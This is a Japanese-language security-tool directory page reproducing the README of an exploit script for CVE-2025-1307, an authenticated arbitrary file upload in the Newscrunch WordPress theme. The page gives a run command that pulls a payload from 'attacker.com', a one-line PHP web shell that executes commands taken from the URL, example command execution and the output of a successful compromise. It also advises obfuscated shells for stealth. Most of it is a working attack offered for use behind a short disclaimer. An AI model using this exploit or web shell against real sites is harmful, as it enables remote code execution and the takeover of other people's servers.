Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - 認証済み(購読者+)任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-1307
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - 認証済み(購読者+)任意のファイルアップロード

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Newscrunch エクスプロイト (CVE-2025-1307)

🚨 概要

このエクスプロイトは、Newscrunch WordPress テーマの深刻な脆弱性 (CVE-2025-1307) を標的とします。この欠陥は、newscrunch_install_and_activate_plugin() 関数における権限チェックの欠落により、認証済みユーザー(Subscriber 以上) が任意のファイルをアップロードできるようにします。これにより、リモートコード実行 (RCE) が可能になり、影響を受ける WordPress サイトが完全に侵害される可能性があります。


🔥 脆弱性の詳細

  • CVE ID: CVE-2025-1307
  • 影響を受けるソフトウェア: Newscrunch WordPress テーマ (<= 1.8.4.1)
  • CWE 分類: CWE-862 - Missing Authorization
  • CVSS スコア: 9.8 (Critical)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 公開日: 2025年3月4日

🛑 深刻度と影響

  • ✅ リモートコード実行 (RCE)
  • ✅ システムの完全な侵害
  • ✅ 不正なファイルアップロード
  • ✅ 権限昇格のリスク

悪用可能性: を持つ有効な WordPress アカウントが必要です。

Subscriber 以上の権限

📜 スクリプトの機能

✅ CVE-2025-1307 の自動悪用
✅ 脆弱なテーマバージョンの自動検出
✅ ZIP ペイロードの自動展開と実行
✅ ZIP からシェルファイル名を動的に取得
✅ 悪用後のシェル利用可否の自動確認
✅ デバッグ用の明快で構造化されたログ出力


🚀 使用方法

📌 前提条件

Python 3.x がインストールされていることを確認し、必要な依存関係をインストールしてください:

root@kitploit:~
pip install requests urllib3 packaging

🔧 エクスプロイトの実行

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 使い方

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ アップロードしたシェルの使用方法

シェルが正常にアップロードされると、ターゲットシステム上でリモートコマンド実行が可能になります。シェルファイルは ZIP アーカイブ内に配置する必要があり、悪用時に自動的に展開されます。

🔹 ZIP ペイロードの作成

PHP シェル (shell.php) が ZIP アーカイブ内にあることを確認してください。次に、エクスプロイトを使用して ZIP ファイルをアップロードします。

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 コマンドの実行

シェルの URL に cmd パラメータを追加することで、ブラウザ経由でシステムコマンドを実行できます:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ シェルの保護

  • これは単純な Web シェルであり、認証がないため、慎重に使用する必要があります。
  • 検出された場合、管理者によって簡単に削除される可能性があります。
  • ステルス運用のためには、難読化された PHP コードやパスワード保護付きシェルの使用を検討してください。

🔹 期待される出力

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ 免責事項

このツールは教育およびセキュリティ研究目的のみで提供されます。脆弱性の無断悪用は違法であり、法律によって罰せられます。作者は、このツールの誤用またはこのツールによって引き起こされた損害について一切の責任を負いません。責任を持って使用してください。

作者: Nxploit | Khaled Alenazi

ツールをダウンロード